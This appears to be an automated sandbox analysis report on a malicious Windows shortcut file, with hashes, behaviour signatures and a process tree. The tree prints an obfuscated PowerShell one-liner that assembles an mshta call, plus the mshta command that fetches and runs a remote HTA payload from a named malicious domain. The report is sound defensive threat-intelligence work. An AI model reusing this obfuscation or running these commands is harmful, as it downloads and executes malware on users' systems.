Resubmissions

21-11-2024 10:04

241121-l33m3svrdk 10

13-11-2024 08:57

241113-kwpbfayjb1 10

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-11-2024 10:04

General

  • Target
    44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
  • Size
    2KB
  • MD5
    353943828023a63279b82cd395e0801b
  • SHA1
    621c1087e5bd6b1b7eee1fa018c781644ee8f932
  • SHA256
    44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb
  • SHA512
    6ea2765098d77d119f98f3c8613829b897f6da1c0fa26458a175d07a15b6cb425be3f0d4ada6fe3f24e680eeeec098b1472e66216a802862240a6b8dfa9983af

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
  • URLs
    hta.dropper: https://x2trump.com/x1.hta

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $x='Ac/lum.pa2MrhtSTx1s:o'; &(-join($x[(263-249),(-179+179),(921-918)])) */ (-join($x[(263-249),(-179+179),(921-918)])); */ ~# (-join($x[(-897+902),(263-249),(526-514),(451-438),(-179+179)])); foreach($I in @((943-931),(-222+235),(956-943),(950-943),(-315+333),(-828+847),(-151+153),(833-831),(666-650),(197-188),(227-214),(373-362),(705-701),(-449+454),(677-670),(894-888),(-407+408),(1009-989),(-692+697),(-715+717),(-771+787),(-788+805),(591-585),(-895+907),(499-486),(-834+842))){$p+=$x[$I]}; ~# $p;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://x2trump.com/x1.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:2172

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2912-38-0x000007FEF4ACE000-0x000007FEF4ACF000-memory.dmp
    Filesize: 4KB
  • memory/2912-40-0x00000000022D0000-0x00000000022D8000-memory.dmp
    Filesize: 32KB
  • memory/2912-39-0x000000001B2B0000-0x000000001B592000-memory.dmp
    Filesize: 2.9MB
  • memory/2912-44-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    Filesize: 9.6MB
  • memory/2912-43-0x00000000029BB000-0x0000000002A22000-memory.dmp
    Filesize: 412KB
  • memory/2912-42-0x00000000029B4000-0x00000000029B7000-memory.dmp
    Filesize: 12KB
  • memory/2912-41-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    Filesize: 9.6MB
  • memory/2912-65-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    Filesize: 9.6MB